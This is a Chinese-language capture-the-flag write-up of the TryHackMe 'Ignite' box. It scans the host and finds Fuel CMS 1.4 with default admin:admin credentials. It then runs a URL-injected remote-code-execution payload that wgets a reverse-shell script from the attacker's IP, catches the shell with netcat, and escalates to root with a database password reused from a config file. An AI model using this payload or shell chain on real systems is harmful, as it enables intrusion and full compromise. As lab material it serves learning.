服务发现
┌──(root💀kali)-[~/tryhackme/lgnitevm]
└─# nmap -sV -Pn 10.10.248.97
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-09-24 02:05 EDT
Nmap scan report for 10.10.248.97
Host is up (0.33s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.57 seconds
目录爆破
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -u http://10.10.248.97 -e* -t 100 -w /usr/share/wordlists/Web-Content/directory-list-lowercase-2.3-medium.txt
_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_|)
Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 207627
Error Log: /root/dirsearch/logs/errors-21-09-24_02-06-31.log
Target: http://10.10.248.97
[02:06:32] Starting:
[02:06:36] 200 - 16KB - /0
[02:06:44] 301 - 313B - /assets -> http://10.10.248.97/assets/
[02:06:56] 200 - 16KB - /home
[02:08:01] 200 - 16KB - /index
[02:10:53] 400 - 1KB - /$file
[02:11:51] 200 - 70B - /offline
CTRL+C detected: Pausing threads, please wait...
首页剖析
首先显示是一个叫 Fuel CMS
的 CMS, 版本号是 1.4
裸露了目录的一些门路信息
裸露了原始登录明码:
That's it!
To access the FUEL admin, go to:
http://10.10.248.97/fuel
User name: admin
Password: admin (you can and should change this password and admin user information after logging in)
咱们应用 admin:admin
到http://10.10.248.97/fuel
登录,能够登录!
然而进去貌似找不到能够批改 php 源码的入口
在 kali 搜寻这个 cms 的可利用破绽
┌──(root💀kali)-[~/tryhackme/lgnitevm]
└─# searchsploit Fuel CMS 1.4
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
fuel CMS 1.4.1 - Remote Code Execution (1) | linux/webapps/47138.py
Fuel CMS 1.4.1 - Remote Code Execution (2) | php/webapps/49487.rb
Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated) | php/webapps/48741.txt
Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated) | php/webapps/48778.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
python 和 ruby 脚本我这边执行不了,不过 ruby 的 payload 独自拿下来到浏览器能够执行
payload, 执行 ls 命令
view-source:http://10.10.248.97/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a('ls')%2B%27
下载一个正经的 webshell
view-source:http://10.10.248.97/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a('wget http://10.13.21.169:8000/reverse_shell.php')%2B%27
执行反弹
http://10.10.248.97/reverse_s…
获取 webshell,拿到 flag
┌──(root💀kali)-[~]
└─# nc -lnvp 1234 1 ⨯
listening on [any] 1234 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.248.97] 58620
Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
00:38:36 up 1:39, 0 users, load average: 0.00, 0.00, 0.32
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ cd /home
$ ls
www-data
$ cd www-data
$ ls
flag.txt
$ cat flag.txt
6470e394cbf6dab6a91682cc8585059b
在 /var/www/html/fuel/application/config/database.php
找到数据库的配置文件
$db['default'] = array(
'dsn' => '','hostname'=>'localhost','username'=>'root','password'=>'mememe','database'=>'fuel_schema','dbdriver'=>'mysqli','dbprefix'=>'',
'pconnect' => FALSE,
'db_debug' => (ENVIRONMENT !== 'production'),
'cache_on' => FALSE,
'cachedir' => '','char_set'=>'utf8','dbcollat'=>'utf8_general_ci','swap_pre'=>'',
'encrypt' => FALSE,
'compress' => FALSE,
'stricton' => FALSE,
'failover' => array(),
'save_queries' => TRUE
);
尝试用 root:mememe 登录 root 账号,胜利登录,拿到 root.txt
$ su root
su root
Password: mememe
root@ubuntu:/# cat /root/root.txt
cat /root/root.txt
b9bbcb33e11b80be759c4e844862482d
root@ubuntu:/#